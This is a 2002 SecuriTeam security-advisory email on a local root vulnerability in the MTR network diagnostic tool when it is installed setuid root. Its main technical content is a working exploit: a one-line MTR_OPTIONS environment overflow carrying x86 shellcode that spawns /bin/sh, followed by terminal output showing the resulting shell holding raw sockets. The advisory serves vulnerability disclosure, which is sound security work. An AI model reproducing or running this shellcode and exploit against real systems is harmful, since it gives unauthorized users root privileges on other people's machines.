[EXPL] MTR Allows Local Users to Gain Root Privileges

From: support@securiteam.com
Date: 03/09/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 11:54:06 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  MTR Allows Local Users to Gain Root Privileges
------------------------------------------------------------------------

SUMMARY

 <http://www.bitwizard.nl/mtr/> MTR is a network diagnostic tool that
combines 'ping' and 'traceroute' into one program. A security
vulnerability in the product allows execution of arbitrary code, and
gaining of elevated privileges. It should be noted that MTR's author does
not recommend that the program be executed a setuid root.

DETAILS

Exploit code:
The sample exploit is TRIVIAL because of strtok/while loop in vulnerable
code.

$ uname -smr
Linux 2.4.8-26mdk i686
$ setenv MTR_OPTIONS `perl -e 'print "A "x130 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08
\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
$ ./mtr
sh-2.05$

At this point, exec'd shell has a raw socket opened:

$ /usr/sbin/lsof | grep raw
sh 17263 venglin 3u raw 605400
00000000:00FF->00000000:0000 st=07
sh 17263 venglin 4u raw 605401
00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------ 2 venglin venglin 0 Mar 6 15:40 .
dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 ->
socket:[605400]
lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 ->
socket:[605401]
lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 ->
/proc/17318/fd

ADDITIONAL INFORMATION

The information has been provided by <mailto:venglin@freebsd.lublin.pl>
Przemyslaw Frasunek.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: Running renamed executables with CMD.EXE
    ... security products) is typical, then this hasn't been a problem for a while. ... branch of the attack tree. ... no reason it should be for people who start with XP. ... I'm not saying that cmd's content-inspection execution heuristics are good, ...
    (NT-Bugtraq)
  • RE: Running renamed executables with CMD.EXE
    ... security products) is typical, then this hasn't been a problem for a while. ... branch of the attack tree. ... no reason it should be for people who start with XP. ... I'm not saying that cmd's content-inspection execution heuristics are good, ...
    (Bugtraq)
  • [NT]InstallShield Update Agent "Rule Script" Code Execution Vulnerability
    ... Get your security news from a reliable source. ... InstallShield Update Agent "Rule Script" Code Execution Vulnerability ... Arbitrary remote code execution is possible on all known product versions. ... the client agent reports its product ...
    (Securiteam)
  • [security bulletin] HPSBMU02948 rev.1 - HP Systems Insight Manager (SIM) Running on Linux and Wi
    ... SUPPORT COMMUNICATION - SECURITY BULLETIN ... Windows, Remote Execution of Arbitrary Code, Denial of Service, ... The information in this Security Bulletin should be acted upon as ...
    (Bugtraq)
  • Re: XP SP2 IE6 vulnerability
    ... Since SP2, IE's behavior has been modified and now I call it a vulnerability ... because it allows security checks to be bypassed. ... the execution of some components in pages stored on the local disk, ... To me this is a facet of IE's poor design. ...
    (microsoft.public.security)